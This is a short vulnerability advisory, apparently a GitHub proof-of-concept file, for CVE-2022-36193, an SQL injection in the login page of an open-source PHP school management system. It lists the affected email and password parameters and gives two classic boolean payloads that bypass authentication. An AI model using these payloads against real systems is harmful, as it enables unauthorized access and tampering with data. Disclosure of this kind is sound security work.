

main

...

Advisory\_G37SYS73M / CVE-2022-36193 / POC.md

G37SYS73M Create POC.md

History

1 contributor

53 lines (50 sloc) | 1.3 KB

...

SQL injection in School Management System 1.0 allows remote attackers to modify or delete data, causing persistent changes to the application's content or behavior by using malicious SQL queries.

[Additional Information]

<https://github.com/lahirudanushka/School-Management-System---PHP-MySQL>

[Vulnerability Type]

SQL Injection

[Vendor of Product]

<https://github.com/lahirudanushka/School-Management-System---PHP-MySQL>

#[Affected Product Code Base]

<https://github.com/lahirudanushka/School-Management-System---PHP-MySQL> - Version 1

[Affected Component]

<http://localhost/login.php> <http://127.0.0.1/login.php>

[Attack Type]

Remote

[Impact Escalation of Privileges]

true

[Attack Vectors]

Boolean Injection to Bypass Authentication:

```
' or '1'='1' # ,
' or 1=1;#
```

Effected Parameter (POST):

email, password

[Discoverer]

Soummya Mukhopadhyay @G37SYS73M